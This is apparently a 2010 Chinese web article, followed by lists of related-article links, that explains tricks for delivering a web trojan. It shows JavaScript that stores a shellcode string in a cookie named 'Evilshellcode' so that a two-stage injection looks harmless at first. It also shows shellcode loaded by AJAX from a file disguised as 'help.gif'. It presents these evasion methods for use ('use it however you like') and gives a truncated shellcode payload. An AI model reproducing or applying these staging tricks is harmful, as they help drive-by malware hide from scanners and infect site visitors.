一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
JavaScript在IE和Firefox(火狐)的不兼容问题解决方法小结
Apr 13 Javascript
网页打开自动最大化的js代码
Aug 22 Javascript
jquery自定义属性(类型/属性值)
May 21 Javascript
基于jquery的文章中所有图片width大小批量设置方法
Aug 01 Javascript
jquery 显示*天*时*分*秒实现时间计时器
May 07 Javascript
jQuery实现鼠标滑过Div层背景变颜色的方法
Feb 17 Javascript
基于jQuery实现的无刷新表格分页实例
Feb 17 Javascript
Javascript中级语法快速入手
Jul 30 Javascript
jquery删除table当前行的实例代码
Oct 07 Javascript
Bootstrap实现的经典栅格布局效果实例【附demo源码】
Mar 30 Javascript
JsChart组件使用详解
Mar 04 Javascript
vue-devtools的安装步骤
Apr 23 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
PHP5.3的垃圾回收机制(动态存储分配方案)深入理解
2012/12/10 PHP
fckeditor上传文件按日期存放及重命名方法
2015/05/22 PHP
PHP使用socket发送HTTP请求的方法
2016/02/14 PHP
JavaScript中将一个值转换为字符串的方法分析[译]
2012/09/21 Javascript
JQuery中extend使用介绍
2014/03/13 Javascript
jquery实现点击查看更多内容控制段落文字展开折叠效果
2015/08/06 Javascript
跟我学习javascript的浮点数精度
2015/11/16 Javascript
jquery中object对象循环遍历的方法
2015/12/18 Javascript
浅谈JavaScript 标准对象
2016/06/02 Javascript
EasyUI中在表单提交之前进行验证
2016/07/19 Javascript
js和jquery中获取非行间样式
2017/05/05 jQuery
微信小程序组件 marquee实例详解
2017/06/23 Javascript
详解React中合并单元格的正确写法
2019/01/08 Javascript
vue中 this.$set的用法详解
2019/09/06 Javascript
layer弹出层倒计时关闭的实现方法
2019/09/27 Javascript
JS绘图Flot如何实现动态可刷新曲线图
2020/10/16 Javascript
vue中的计算属性和侦听属性
2020/11/06 Javascript
Python基于smtplib实现异步发送邮件服务
2015/05/28 Python
python数据结构链表之单向链表(实例讲解)
2017/07/25 Python
Python及PyCharm下载与安装教程
2017/11/18 Python
解决.ui文件生成的.py文件运行不出现界面的方法
2019/06/19 Python
利用python、tensorflow、opencv、pyqt5实现人脸实时签到系统
2019/09/25 Python
python实现将视频按帧读取到自定义目录
2019/12/10 Python
Giglio俄罗斯奢侈品购物网:男士、女士、儿童高级时装
2018/07/27 全球购物
新西兰廉价汽车租赁:Snap Rentals
2018/09/14 全球购物
Lookfantastic阿联酋官网:英国知名美妆护肤购物网站
2020/05/26 全球购物
英文求职信结束语大全
2013/10/26 职场文书
年会搞笑主持词
2014/03/27 职场文书
大学生求职计划书
2014/04/30 职场文书
公司年底活动方案
2014/08/17 职场文书
2014离婚协议书范文
2014/09/10 职场文书
实施意见格式范本
2015/06/05 职场文书
准备去美国留学,那么大学申请文书应该怎么写?
2019/08/12 职场文书
关于食品安全的演讲稿范文(三篇)
2019/10/21 职场文书
详解vue中v-for的key唯一性
2021/05/15 Vue.js
详解flex:1什么意思
2022/07/23 HTML / CSS